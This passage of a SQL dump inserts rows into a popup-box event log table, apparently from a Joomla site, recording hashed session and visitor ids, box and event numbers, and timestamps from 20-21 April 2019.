(82091, '8ff1b42db259beede04f99971d734cd4', '913c1d6747e8d02e', 0, 2, 1, '2019-04-20 16:35:08'),
(82092, 'a8b8185f1d82f5bd28b47c07e148a9d6', '59970aaeed13af41', 0, 2, 1, '2019-04-20 16:35:15'),
(82093, '7ceb002dbf0a0298d2704c2c7097fda9', 'cf4770793ce098e4', 0, 2, 1, '2019-04-20 16:37:35'),
(82094, 'a8b8185f1d82f5bd28b47c07e148a9d6', '59970aaeed13af41', 0, 2, 1, '2019-04-20 16:38:20'),
(82095, '8ff1b42db259beede04f99971d734cd4', '913c1d6747e8d02e', 0, 2, 1, '2019-04-20 16:38:58'),
(82096, '963ad3b74ab49cfc577b06848ffa424c', '99ddf52c8ba9b467', 0, 2, 1, '2019-04-20 16:41:49'),
(82097, '2beb15c55eae4307e8ab657043a5cba1', 'e4fe04107dd9e994', 0, 2, 1, '2019-04-20 16:42:43'),
(82098, 'c980cbc8685bdfd6233c409a94aa3fe5', 'b4ff8eb9b2eaa42d', 0, 2, 1, '2019-04-20 16:43:02'),
(82099, '6f2d997e9fee9deb5925490eaa63f4d4', '5183cdeb790849af', 0, 2, 1, '2019-04-20 16:45:37'),
(82100, '8457d707417ccee7a4066cd010d1143d', '39f5f5281ebede15', 0, 2, 1, '2019-04-20 16:50:19'),
(82101, '8457d707417ccee7a4066cd010d1143d', '39f5f5281ebede15', 0, 2, 1, '2019-04-20 16:50:46'),
(82102, '8457d707417ccee7a4066cd010d1143d', '39f5f5281ebede15', 0, 2, 1, '2019-04-20 16:53:12'),
(82103, '8457d707417ccee7a4066cd010d1143d', '39f5f5281ebede15', 0, 2, 1, '2019-04-20 16:53:24'),
(82104, '31e9549217e0596b7f57d637a5b0b2d7', '6d783f035a30d30d', 0, 2, 1, '2019-04-20 16:57:54'),
(82105, 'ff59fd284ad09a8dd393f7a60cf3227b', 'ebb6d906a56cd53a', 0, 2, 1, '2019-04-20 16:58:32'),
(82106, '31e9549217e0596b7f57d637a5b0b2d7', '6d783f035a30d30d', 0, 2, 1, '2019-04-20 16:59:04'),
(82107, '027f30eacc11a411ab8a653fbe92d842', '21f069d24c94121b', 0, 2, 1, '2019-04-20 17:15:13'),
(82108, '027f30eacc11a411ab8a653fbe92d842', '21f069d24c94121b', 0, 2, 1, '2019-04-20 17:15:18'),
(82109, '4ba4c4a9b3d796074b1f057bf540aaf0', '25b00c8f930d148c', 0, 2, 1, '2019-04-20 17:16:06'),
(82110, '6139b83f2564d52653837bcce30e0e2c', '0315a9e8bb354f60', 0, 2, 1, '2019-04-20 17:25:48'),
(82111, '6139b83f2564d52653837bcce30e0e2c', '0315a9e8bb354f60', 0, 2, 1, '2019-04-20 17:32:24'),
(82112, '62454822724454cfebef19ac99aeaf24', '6e117bd555667400', 0, 2, 1, '2019-04-20 17:35:21'),
(82113, '842f8edd816807edfd994561042ef9b9', 'e9d10c7f7af3c7c6', 0, 2, 1, '2019-04-20 17:41:30'),
(82114, '7e2085c95aab9d229b2829fc7ab0729e', '92127ae1b4d5b310', 0, 2, 1, '2019-04-20 17:43:59'),
(82115, '842f8edd816807edfd994561042ef9b9', 'e9d10c7f7af3c7c6', 0, 2, 1, '2019-04-20 17:44:49'),
(82116, '8ff1b42db259beede04f99971d734cd4', '913c1d6747e8d02e', 0, 2, 1, '2019-04-20 17:52:03'),
(82117, '842f8edd816807edfd994561042ef9b9', 'e9d10c7f7af3c7c6', 0, 2, 1, '2019-04-20 17:54:21'),
(82118, '32d01c9b179e6b7ad45121574fdad490', '64a658fbde059399', 0, 2, 1, '2019-04-20 17:56:48'),
(82119, '62454822724454cfebef19ac99aeaf24', '6e117bd555667400', 0, 2, 1, '2019-04-20 17:59:04'),
(82120, 'dc9aaff4e0a4802722b9fe9280f6ef2a', '4df5ced8675ad994', 0, 2, 1, '2019-04-20 18:00:17'),
(82121, '9e808133a25e1ba3f877897fe2a483ba', '76aee5f00b56ba78', 0, 2, 1, '2019-04-20 18:08:22'),
(82122, '8ff1b42db259beede04f99971d734cd4', '913c1d6747e8d02e', 0, 2, 1, '2019-04-20 18:10:40'),
(82123, '23f8078bc835004eb7c79ee708667852', '7b16863d40230e2a', 0, 2, 1, '2019-04-20 18:11:53'),
(82124, '6139b83f2564d52653837bcce30e0e2c', '0315a9e8bb354f60', 0, 2, 1, '2019-04-20 18:12:26'),
(82125, '0f291da2983b84d8c570e882618ce5e0', '19bcc476e66aa8b8', 0, 2, 1, '2019-04-20 18:16:56'),
(82126, '6139b83f2564d52653837bcce30e0e2c', '0315a9e8bb354f60', 0, 2, 1, '2019-04-20 18:18:33'),
(82127, 'ae30dc74262fec44229100cb49bfdf33', 'a88c8206896065a3', 0, 2, 1, '2019-04-20 18:18:58');
INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(82128, '48b216f74660d1e6ea2e7fd585cb8760', 'ad644c1be93d1fe8', 0, 2, 1, '2019-04-20 18:22:08'),
(82129, 'ae30dc74262fec44229100cb49bfdf33', 'a88c8206896065a3', 0, 2, 1, '2019-04-20 18:22:12'),
(82130, '522b565a1e4b2ad19249c9856641e516', '407f941e65afbd7a', 0, 2, 1, '2019-04-20 18:22:30'),
(82131, '8d5ddeefbe744ef3d603e8ff39c31385', 'e187735a1c501efa', 0, 2, 1, '2019-04-20 18:23:45'),
(82132, '7ea79fdc9a9c7a04de3ac23b28d10122', 'f953c11a6a36afb6', 0, 2, 1, '2019-04-20 18:24:12'),
(82133, '7ea79fdc9a9c7a04de3ac23b28d10122', 'f953c11a6a36afb6', 0, 2, 1, '2019-04-20 18:26:40'),
(82134, '7ea79fdc9a9c7a04de3ac23b28d10122', 'f953c11a6a36afb6', 0, 2, 1, '2019-04-20 18:27:42'),
(82135, '842f8edd816807edfd994561042ef9b9', 'e9d10c7f7af3c7c6', 0, 2, 1, '2019-04-20 18:28:18'),
(82136, '842f8edd816807edfd994561042ef9b9', 'e9d10c7f7af3c7c6', 0, 2, 1, '2019-04-20 18:31:50'),
(82137, 'b4e22cdfdddc7e8b11ab36ab0bafc8c1', 'b7f732384cb533aa', 0, 2, 1, '2019-04-20 18:52:48'),
(82138, 'b4e22cdfdddc7e8b11ab36ab0bafc8c1', 'b7f732384cb533aa', 0, 2, 1, '2019-04-20 19:01:46'),
(82139, '327e057c87dc4b21d228f0f8505b2c52', 'ff883d095e084845', 0, 2, 1, '2019-04-20 19:07:23'),
(82140, '327e057c87dc4b21d228f0f8505b2c52', 'ff883d095e084845', 0, 2, 1, '2019-04-20 19:08:53'),
(82141, 'ae93eeebef72053b068502d65e1c4ebe', '3affdb6d237dd814', 0, 2, 1, '2019-04-20 19:10:32'),
(82142, '9aefe0baf916a1b82cb988783c64e04b', '6d783f035a30d30d', 0, 2, 1, '2019-04-20 19:16:26'),
(82143, 'c0d292234da387116cd2b117a90cd5f9', 'e567435cac654a90', 0, 2, 1, '2019-04-20 19:26:32'),
(82144, 'c0d292234da387116cd2b117a90cd5f9', 'e567435cac654a90', 0, 2, 1, '2019-04-20 19:31:09'),
(82145, 'd15e0a2594dfdd7d7e83c4dc24be8a4a', '0bda79c1eeb89ee3', 0, 2, 1, '2019-04-20 19:37:17'),
(82146, '859a5fe0467c3b612beed7cc00761f0d', '863b661787591b2d', 0, 2, 1, '2019-04-20 19:49:29'),
(82147, 'c0d292234da387116cd2b117a90cd5f9', 'e567435cac654a90', 0, 2, 1, '2019-04-20 19:50:30'),
(82148, '6970c54ebef4683c489d650ca939b416', '2f354d90a5695c8f', 0, 2, 1, '2019-04-20 19:56:52'),
(82149, 'cf9c429766fa6cd8f0fb2e1ec9e0ca8e', '4ebccd84a6c89e89', 0, 2, 1, '2019-04-20 20:15:35'),
(82150, '842f8edd816807edfd994561042ef9b9', 'e9d10c7f7af3c7c6', 0, 2, 1, '2019-04-20 20:25:57'),
(82151, 'a9c5a4f2d520b6d308353bf1f95360c6', '539b96bddb15c5b0', 0, 2, 1, '2019-04-20 20:26:39'),
(82152, '842f8edd816807edfd994561042ef9b9', 'e9d10c7f7af3c7c6', 0, 2, 1, '2019-04-20 20:27:00'),
(82153, '9b447c738b030295600af33a779d07c5', '73aab8cd71747dcd', 0, 2, 1, '2019-04-20 21:29:50'),
(82154, 'e6cf872ced9b638464df55490e20e08a', '2b3f5a7886f46df5', 0, 2, 1, '2019-04-20 21:40:50'),
(82155, '1a45ab9d6fb66b5e3a5c269173aea3ed', '95602814eeed51e8', 0, 2, 1, '2019-04-20 21:41:22'),
(82156, '870342d9b88e55b8ef3c92589b589961', '53d72d16ebf0eb73', 0, 2, 1, '2019-04-20 22:01:26'),
(82157, '870342d9b88e55b8ef3c92589b589961', '53d72d16ebf0eb73', 0, 2, 1, '2019-04-20 22:02:28'),
(82158, '8c575899e01f8ebbe136b3127297b2ec', '6ae1180d83882097', 0, 2, 1, '2019-04-20 22:22:58'),
(82159, '79cd1bcf1dbe99ac267b00905feea139', 'fcd7abde5b97211c', 0, 2, 1, '2019-04-20 22:40:05'),
(82160, '1b761b6091280268ef65558b3b11a47c', 'f7fef20839e7b60f', 0, 2, 1, '2019-04-20 22:40:45'),
(82161, '978d1e41896d6f688a3a21991f437f20', '599c55e3003283e6', 0, 2, 1, '2019-04-20 23:05:54'),
(82162, '978d1e41896d6f688a3a21991f437f20', '599c55e3003283e6', 0, 2, 1, '2019-04-20 23:08:01'),
(82163, 'aad7a0acc86cb5cf5b3c86d764aba1ce', '0a244bf7eca8c07c', 0, 2, 1, '2019-04-20 23:11:35'),
(82164, '338debac767b314c71d183da3845e52b', '97305784ba29903c', 0, 2, 1, '2019-04-20 23:12:30'),
(82165, '7fabb83616b4f92cc6ba0adf6c7c977d', '8bfe49c183768dad', 0, 2, 1, '2019-04-20 23:21:43'),
(82166, '39475e05d3ed4d5d24a3bc5d3a94cd38', '219094838ce323f2', 0, 2, 1, '2019-04-20 23:41:37'),
(82167, '3c23f920caf71a184ede6122d80773bf', '88e290b24b01c6ba', 0, 2, 1, '2019-04-21 00:22:52'),
(82168, '06d6c99e78aaea3308170e8605e3f38b', 'a99c82dd76d590ee', 0, 2, 1, '2019-04-21 00:23:56'),
(82169, '3c23f920caf71a184ede6122d80773bf', '88e290b24b01c6ba', 0, 2, 1, '2019-04-21 00:24:13'),
(82170, '13b8824bedcce5d8ab97e96ffe0df2d0', '2a27e151d958b295', 0, 2, 1, '2019-04-21 00:53:59'),
(82171, 'f53f25627f8e442fcedc4059ffbc0976', '1c9386037e0f95bb', 0, 2, 1, '2019-04-21 01:13:58'),
(82172, 'ae93eeebef72053b068502d65e1c4ebe', '3affdb6d237dd814', 0, 2, 1, '2019-04-21 02:00:05'),
(82173, '9453b10c2f2dc743593c8081469adff0', '5f3d9e92fa57bcf9', 0, 2, 1, '2019-04-21 02:51:59'),
(82174, '02eca2b1c304eacd9983bd692c67cf9f', 'e793b6887430710e', 0, 2, 1, '2019-04-21 03:08:46'),
(82175, 'd8510fe797c13768f7cad8616df54abd', '7ffba4677245886f', 0, 2, 1, '2019-04-21 03:10:32'),
(82176, '02eca2b1c304eacd9983bd692c67cf9f', 'e793b6887430710e', 0, 2, 1, '2019-04-21 03:12:34'),
(82177, 'f2c112a592b6db62aa5b27a3a0d0056e', '7ef888dc054ad35f', 0, 2, 1, '2019-04-21 03:18:56'),
(82178, '00c5736591710890fa98c2f2fedac22e', '1624785298a8447a', 0, 2, 1, '2019-04-21 03:28:31'),
(82179, '00c5736591710890fa98c2f2fedac22e', '1624785298a8447a', 0, 2, 1, '2019-04-21 03:28:55'),
(82180, '2203a359a3815a8ed07f8f4bd0ebe687', 'fbe07945ac1ff929', 0, 2, 1, '2019-04-21 03:32:04'),
(82181, '36a235013d81f5e712cb22827bc98c70', 'bfb252035e4a0c49', 0, 2, 1, '2019-04-21 04:13:41'),
(82182, '3e2206dbee74a09d99e95f047c8c613a', 'b0d617f1c6974310', 0, 2, 1, '2019-04-21 04:48:28'),
(82183, 'bc6410418ae549c8b31522a6fa0ea8e9', 'e3413f2163c4f64a', 0, 2, 1, '2019-04-21 04:55:38'),
(82184, 'fdc7b2565f024a8ac1005fb6a8323790', 'a2ba22d041888407', 0, 2, 1, '2019-04-21 05:06:44'),
(82185, 'fdc7b2565f024a8ac1005fb6a8323790', 'a2ba22d041888407', 0, 2, 1, '2019-04-21 05:07:30'),
(82186, 'ce3780135f3d1be4bfa132740e51faa5', 'a2b92167f54c9dc2', 0, 2, 1, '2019-04-21 05:07:56'),
(82187, 'ce3780135f3d1be4bfa132740e51faa5', 'a2b92167f54c9dc2', 0, 2, 1, '2019-04-21 05:08:12'),
(82188, 'fdc7b2565f024a8ac1005fb6a8323790', 'a2ba22d041888407', 0, 2, 1, '2019-04-21 05:08:50'),
(82189, 'fdc7b2565f024a8ac1005fb6a8323790', 'a2ba22d041888407', 0, 2, 1, '2019-04-21 05:08:59'),
(82190, 'fdc7b2565f024a8ac1005fb6a8323790', 'a2ba22d041888407', 0, 2, 1, '2019-04-21 05:09:09'),
(82191, '5ebe5ef8ecabe33727b2c4f8ae0f41cc', '11460ebe08e5013b', 0, 2, 1, '2019-04-21 05:10:49'),
(82192, 'bfce523c4a976479d22be83f07a9252c', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-04-21 05:12:39'),
(82193, '55c34bb42f3b453d528b0f2ea202a34e', 'df27b9a2919a8206', 0, 2, 1, '2019-04-21 05:33:57'),
(82194, '55c34bb42f3b453d528b0f2ea202a34e', 'df27b9a2919a8206', 0, 2, 1, '2019-04-21 05:34:20'),
(82195, '36b1a121064831f1263e417e547b66a0', 'f611c3e853269389', 0, 2, 1, '2019-04-21 05:36:25'),
(82196, '36b1a121064831f1263e417e547b66a0', 'f611c3e853269389', 0, 2, 1, '2019-04-21 05:36:57'),
(82197, '36b1a121064831f1263e417e547b66a0', 'f611c3e853269389', 0, 2, 1, '2019-04-21 05:37:09'),
(82198, '55c34bb42f3b453d528b0f2ea202a34e', 'df27b9a2919a8206', 0, 2, 1, '2019-04-21 05:47:14'),
(82199, 'dfacc4e39abfd54b78e758ac43bf86e5', 'a30c08bfcb146c2b', 0, 2, 1, '2019-04-21 05:47:18'),
(82200, 'dfacc4e39abfd54b78e758ac43bf86e5', 'a30c08bfcb146c2b', 0, 2, 1, '2019-04-21 05:47:40'),
(82201, '59386d9ce1ae5be53747b1456f1cf832', 'dd7e646a48a7c951', 0, 2, 1, '2019-04-21 05:50:16'),
(82202, '50eec92c44bb0dc547faa19693e56bb6', '0f82ee3c80278677', 0, 2, 1, '2019-04-21 05:50:51'),
(82203, '619363db4ea7482f24bd77e31d4acae9', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-21 05:51:29'),
(82204, '55c34bb42f3b453d528b0f2ea202a34e', 'df27b9a2919a8206', 0, 2, 1, '2019-04-21 05:56:46'),
(82205, '619363db4ea7482f24bd77e31d4acae9', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-21 05:58:14'),
(82206, '0340fd1435ab7a86552988cc3d3cee26', 'c708ea201ca66e50', 0, 2, 1, '2019-04-21 05:59:15'),
(82207, '0340fd1435ab7a86552988cc3d3cee26', 'c708ea201ca66e50', 0, 2, 1, '2019-04-21 05:59:23'),
(82208, '55c34bb42f3b453d528b0f2ea202a34e', 'df27b9a2919a8206', 0, 2, 1, '2019-04-21 06:00:18'),
(82209, '0340fd1435ab7a86552988cc3d3cee26', 'c708ea201ca66e50', 0, 2, 1, '2019-04-21 06:00:34'),
(82210, '0340fd1435ab7a86552988cc3d3cee26', 'c708ea201ca66e50', 0, 2, 1, '2019-04-21 06:00:52'),
(82211, '55c34bb42f3b453d528b0f2ea202a34e', 'df27b9a2919a8206', 0, 2, 1, '2019-04-21 06:00:57'),
(82212, 'b6d25cd7e92d069c5861f50539183b4b', '324d0c5c1f480926', 0, 2, 1, '2019-04-21 06:03:39'),
(82213, '0e59b61e575430890cc7481a23310140', 'f047de0ce07e87fd', 0, 2, 1, '2019-04-21 06:03:40'),
(82214, 'bfce523c4a976479d22be83f07a9252c', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-04-21 06:03:41'),
(82215, '55c34bb42f3b453d528b0f2ea202a34e', 'df27b9a2919a8206', 0, 2, 1, '2019-04-21 06:04:24'),
(82216, '36b1a121064831f1263e417e547b66a0', 'f611c3e853269389', 0, 2, 1, '2019-04-21 06:04:31'),
(82217, 'b6d25cd7e92d069c5861f50539183b4b', '324d0c5c1f480926', 0, 2, 1, '2019-04-21 06:05:13'),
(82218, 'a1504a3fa49bec43c9cf9e8a364ea327', '1c68b977b911188c', 0, 2, 1, '2019-04-21 06:05:15'),
(82219, 'b6d25cd7e92d069c5861f50539183b4b', '324d0c5c1f480926', 0, 2, 1, '2019-04-21 06:05:29'),
(82220, 'b6d25cd7e92d069c5861f50539183b4b', '324d0c5c1f480926', 0, 2, 1, '2019-04-21 06:05:51'),
(82221, 'b6d25cd7e92d069c5861f50539183b4b', '324d0c5c1f480926', 0, 2, 1, '2019-04-21 06:06:00'),
(82222, '64a41f22d5f67f2c9e66f6740444af8e', '575b738595cdb2f5', 0, 2, 1, '2019-04-21 06:07:19'),
(82223, 'b6d25cd7e92d069c5861f50539183b4b', '324d0c5c1f480926', 0, 2, 1, '2019-04-21 06:08:39'),
(82224, 'f1da686e867089e357fced2741c62db9', '4ba6ca579de82f6e', 0, 2, 1, '2019-04-21 06:08:47'),
(82225, '619363db4ea7482f24bd77e31d4acae9', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-21 06:09:13'),
(82226, '619363db4ea7482f24bd77e31d4acae9', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-21 06:09:34'),
(82227, '55c34bb42f3b453d528b0f2ea202a34e', 'df27b9a2919a8206', 0, 2, 1, '2019-04-21 06:10:43'),
(82228, '619363db4ea7482f24bd77e31d4acae9', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-21 06:10:57'),
(82229, 'be5eb93ba6ef4ead597c7fe04cf01dd9', '21f069d24c94121b', 0, 2, 1, '2019-04-21 06:11:17'),
(82230, 'e1e0a2c5139e8f21e9024c455832836d', 'cdece7d9f3e75b7a', 0, 2, 1, '2019-04-21 06:12:18'),
(82231, 'bc6410418ae549c8b31522a6fa0ea8e9', 'e3413f2163c4f64a', 0, 2, 1, '2019-04-21 06:12:36'),
(82232, '619363db4ea7482f24bd77e31d4acae9', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-21 06:14:12'),
(82233, 'b6d25cd7e92d069c5861f50539183b4b', '324d0c5c1f480926', 0, 2, 1, '2019-04-21 06:14:54'),
(82234, 'e46de991bdbbdaa512ea081a1837a484', '390c8ebb4f0af7ce', 0, 2, 1, '2019-04-21 06:15:00'),
(82235, 'b6d25cd7e92d069c5861f50539183b4b', '324d0c5c1f480926', 0, 2, 1, '2019-04-21 06:15:05'),
(82236, '72e3ec07c64134ceb67eb82521a7006e', '0530018377078939', 0, 2, 1, '2019-04-21 06:15:13'),
(82237, '5c40e397d914c251b1dfa30d15a9b405', '6e117bd555667400', 0, 2, 1, '2019-04-21 06:15:24'),
(82238, 'e1e0a2c5139e8f21e9024c455832836d', 'cdece7d9f3e75b7a', 0, 2, 1, '2019-04-21 06:16:10'),
(82239, 'e1e0a2c5139e8f21e9024c455832836d', 'cdece7d9f3e75b7a', 0, 2, 1, '2019-04-21 06:16:27'),
(82240, '55c34bb42f3b453d528b0f2ea202a34e', 'df27b9a2919a8206', 0, 2, 1, '2019-04-21 06:16:41'),
(82241, 'cb07f90f0b099d700ea78bcc175d505a', '152368483234a613', 0, 2, 1, '2019-04-21 06:17:02'),
(82242, 'bfce523c4a976479d22be83f07a9252c', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-04-21 06:17:36'),
(82243, '619363db4ea7482f24bd77e31d4acae9', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-21 06:18:03'),
(82244, '1a90ab43aec650a5b18c03ee0fcc502c', '1febf3043a354c53', 0, 2, 1, '2019-04-21 06:18:51'),
(82245, '619363db4ea7482f24bd77e31d4acae9', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-21 06:20:29'),
(82246, 'be5eb93ba6ef4ead597c7fe04cf01dd9', '21f069d24c94121b', 0, 2, 1, '2019-04-21 06:20:41'),
(82247, 'be5eb93ba6ef4ead597c7fe04cf01dd9', '21f069d24c94121b', 0, 2, 1, '2019-04-21 06:21:03'),
(82248, '1b9d1d7142312f6b7b6971d930f262f3', '1c68b977b911188c', 0, 2, 1, '2019-04-21 06:21:10'),
(82249, 'f1da686e867089e357fced2741c62db9', '4ba6ca579de82f6e', 0, 2, 1, '2019-04-21 06:21:21'),
(82250, '55c34bb42f3b453d528b0f2ea202a34e', 'df27b9a2919a8206', 0, 2, 1, '2019-04-21 06:21:24'),
(82251, '55c34bb42f3b453d528b0f2ea202a34e', 'df27b9a2919a8206', 0, 2, 1, '2019-04-21 06:21:41'),
(82252, 'bfce523c4a976479d22be83f07a9252c', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-04-21 06:21:48'),
(82253, 'e1e0a2c5139e8f21e9024c455832836d', 'cdece7d9f3e75b7a', 0, 2, 1, '2019-04-21 06:22:01'),
(82254, 'e1e0a2c5139e8f21e9024c455832836d', 'cdece7d9f3e75b7a', 0, 2, 1, '2019-04-21 06:22:04'),
(82255, '55c34bb42f3b453d528b0f2ea202a34e', 'df27b9a2919a8206', 0, 2, 1, '2019-04-21 06:22:19'),
(82256, '619363db4ea7482f24bd77e31d4acae9', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-21 06:23:47'),
(82257, '619363db4ea7482f24bd77e31d4acae9', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-21 06:25:05'),
(82258, 'be5eb93ba6ef4ead597c7fe04cf01dd9', '21f069d24c94121b', 0, 2, 1, '2019-04-21 06:25:12'),
(82259, 'e1e0a2c5139e8f21e9024c455832836d', 'cdece7d9f3e75b7a', 0, 2, 1, '2019-04-21 06:25:36'),
(82260, '116891639298d762e0ecf0e75526bb01', '2d487c95d578ed75', 0, 2, 1, '2019-04-21 06:25:42'),
(82261, '619363db4ea7482f24bd77e31d4acae9', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-21 06:25:56'),
(82262, '619363db4ea7482f24bd77e31d4acae9', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-21 06:26:48'),
(82263, 'b47e1491e5c7e5584de2f15797f3da9d', '4bc006e5b1ffa0ee', 0, 2, 1, '2019-04-21 06:27:31'),
(82264, 'e1e0a2c5139e8f21e9024c455832836d', 'cdece7d9f3e75b7a', 0, 2, 1, '2019-04-21 06:27:40'),
(82265, '619363db4ea7482f24bd77e31d4acae9', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-21 06:28:18'),
(82266, 'be5eb93ba6ef4ead597c7fe04cf01dd9', '21f069d24c94121b', 0, 2, 1, '2019-04-21 06:28:19'),
(82267, 'e1e0a2c5139e8f21e9024c455832836d', 'cdece7d9f3e75b7a', 0, 2, 1, '2019-04-21 06:28:25'),
(82268, 'e1e0a2c5139e8f21e9024c455832836d', 'cdece7d9f3e75b7a', 0, 2, 1, '2019-04-21 06:28:31'),
(82269, '619363db4ea7482f24bd77e31d4acae9', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-21 06:28:33'),
(82270, '55c34bb42f3b453d528b0f2ea202a34e', 'df27b9a2919a8206', 0, 2, 1, '2019-04-21 06:28:40'),
(82271, 'b6d25cd7e92d069c5861f50539183b4b', '324d0c5c1f480926', 0, 2, 1, '2019-04-21 06:28:55'),
(82272, '54c74eb3a0642336fbfb6e1ba41cd054', '1e8786f2f88c192b', 0, 2, 1, '2019-04-21 06:29:04'),
(82273, '619363db4ea7482f24bd77e31d4acae9', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-21 06:29:05'),
(82274, 'b6d25cd7e92d069c5861f50539183b4b', '324d0c5c1f480926', 0, 2, 1, '2019-04-21 06:29:47'),
(82275, '6272153a2c57f2b5b7f8b0025a456d53', 'b9974a919762d897', 0, 2, 1, '2019-04-21 06:29:58'),
(82276, '619363db4ea7482f24bd77e31d4acae9', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-21 06:30:00'),
(82277, 'e1e0a2c5139e8f21e9024c455832836d', 'cdece7d9f3e75b7a', 0, 2, 1, '2019-04-21 06:30:02'),
(82278, 'e1e0a2c5139e8f21e9024c455832836d', 'cdece7d9f3e75b7a', 0, 2, 1, '2019-04-21 06:30:06'),
(82279, '4606ef3f7e9e160b4c7ea1ae39880bf5', 'cb1805ab847b2d09', 0, 2, 1, '2019-04-21 06:30:16'),
(82280, '54c74eb3a0642336fbfb6e1ba41cd054', '1e8786f2f88c192b', 0, 2, 1, '2019-04-21 06:30:20'),
(82281, '55c34bb42f3b453d528b0f2ea202a34e', 'df27b9a2919a8206', 0, 2, 1, '2019-04-21 06:30:39'),
(82282, 'be5eb93ba6ef4ead597c7fe04cf01dd9', '21f069d24c94121b', 0, 2, 1, '2019-04-21 06:31:11'),
(82283, 'e1e0a2c5139e8f21e9024c455832836d', 'cdece7d9f3e75b7a', 0, 2, 1, '2019-04-21 06:31:19'),
(82284, 'e1e0a2c5139e8f21e9024c455832836d', 'cdece7d9f3e75b7a', 0, 2, 1, '2019-04-21 06:31:21'),
(82285, '619363db4ea7482f24bd77e31d4acae9', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-21 06:31:36'),
(82286, '4606ef3f7e9e160b4c7ea1ae39880bf5', 'cb1805ab847b2d09', 0, 2, 1, '2019-04-21 06:32:07'),
(82287, 'e1e0a2c5139e8f21e9024c455832836d', 'cdece7d9f3e75b7a', 0, 2, 1, '2019-04-21 06:32:17'),
(82288, 'b6d25cd7e92d069c5861f50539183b4b', '324d0c5c1f480926', 0, 2, 1, '2019-04-21 06:32:50'),
(82289, '619363db4ea7482f24bd77e31d4acae9', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-21 06:32:58'),
(82290, 'b6d25cd7e92d069c5861f50539183b4b', '324d0c5c1f480926', 0, 2, 1, '2019-04-21 06:33:12'),
(82291, '619363db4ea7482f24bd77e31d4acae9', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-21 06:33:34'),
(82292, 'be5eb93ba6ef4ead597c7fe04cf01dd9', '21f069d24c94121b', 0, 2, 1, '2019-04-21 06:33:41'),
(82293, '2bbb41152a2681c2d096e2fea2312b0e', '3de88ff4581dab27', 0, 2, 1, '2019-04-21 06:33:58'),
(82294, '2bbb41152a2681c2d096e2fea2312b0e', '3de88ff4581dab27', 0, 2, 1, '2019-04-21 06:34:02'),
(82295, '55c34bb42f3b453d528b0f2ea202a34e', 'df27b9a2919a8206', 0, 2, 1, '2019-04-21 06:34:03'),
(82296, 'b6d25cd7e92d069c5861f50539183b4b', '324d0c5c1f480926', 0, 2, 1, '2019-04-21 06:34:03'),
(82297, 'e1e0a2c5139e8f21e9024c455832836d', 'cdece7d9f3e75b7a', 0, 2, 1, '2019-04-21 06:34:08'),
(82298, '619363db4ea7482f24bd77e31d4acae9', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-21 06:34:25'),
(82299, 'b6d25cd7e92d069c5861f50539183b4b', '324d0c5c1f480926', 0, 2, 1, '2019-04-21 06:36:23'),
(82300, 'b6d25cd7e92d069c5861f50539183b4b', '324d0c5c1f480926', 0, 2, 1, '2019-04-21 06:36:25'),
(82301, 'e1e0a2c5139e8f21e9024c455832836d', 'cdece7d9f3e75b7a', 0, 2, 1, '2019-04-21 06:36:30'),
(82302, 'b6d25cd7e92d069c5861f50539183b4b', '324d0c5c1f480926', 0, 2, 1, '2019-04-21 06:36:56'),
(82303, 'b6d25cd7e92d069c5861f50539183b4b', '324d0c5c1f480926', 0, 2, 1, '2019-04-21 06:37:03'),
(82304, 'b6d25cd7e92d069c5861f50539183b4b', '324d0c5c1f480926', 0, 2, 1, '2019-04-21 06:37:28'),
(82305, '55c34bb42f3b453d528b0f2ea202a34e', 'df27b9a2919a8206', 0, 2, 1, '2019-04-21 06:37:35'),
(82306, '55c34bb42f3b453d528b0f2ea202a34e', 'df27b9a2919a8206', 0, 2, 1, '2019-04-21 06:37:46'),
(82307, 'be5eb93ba6ef4ead597c7fe04cf01dd9', '21f069d24c94121b', 0, 2, 1, '2019-04-21 06:38:03'),
(82308, 'e1e0a2c5139e8f21e9024c455832836d', 'cdece7d9f3e75b7a', 0, 2, 1, '2019-04-21 06:38:05'),
(82309, '619363db4ea7482f24bd77e31d4acae9', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-21 06:38:23'),
(82310, 'be5eb93ba6ef4ead597c7fe04cf01dd9', '21f069d24c94121b', 0, 2, 1, '2019-04-21 06:38:24'),
(82311, 'e1e0a2c5139e8f21e9024c455832836d', 'cdece7d9f3e75b7a', 0, 2, 1, '2019-04-21 06:39:27'),
(82312, 'be5eb93ba6ef4ead597c7fe04cf01dd9', '21f069d24c94121b', 0, 2, 1, '2019-04-21 06:40:11'),
(82313, 'be5eb93ba6ef4ead597c7fe04cf01dd9', '21f069d24c94121b', 0, 2, 1, '2019-04-21 06:40:26'),
(82314, '55c34bb42f3b453d528b0f2ea202a34e', 'df27b9a2919a8206', 0, 2, 1, '2019-04-21 06:40:29'),
(82315, '3b2a15b4e2704a3061acd413b49a4a25', '3bece7bd84369fae', 0, 2, 1, '2019-04-21 06:40:56'),
(82316, '619363db4ea7482f24bd77e31d4acae9', '65fb1a08fe2b5aab', 0, 2, 1, '2019-04-21 06:41:17'),
(82317, '050b8b3bcde8a659cd690259c4f36406', '85c87c6892dfb12d', 0, 2, 1, '2019-04-21 06:41:19'),
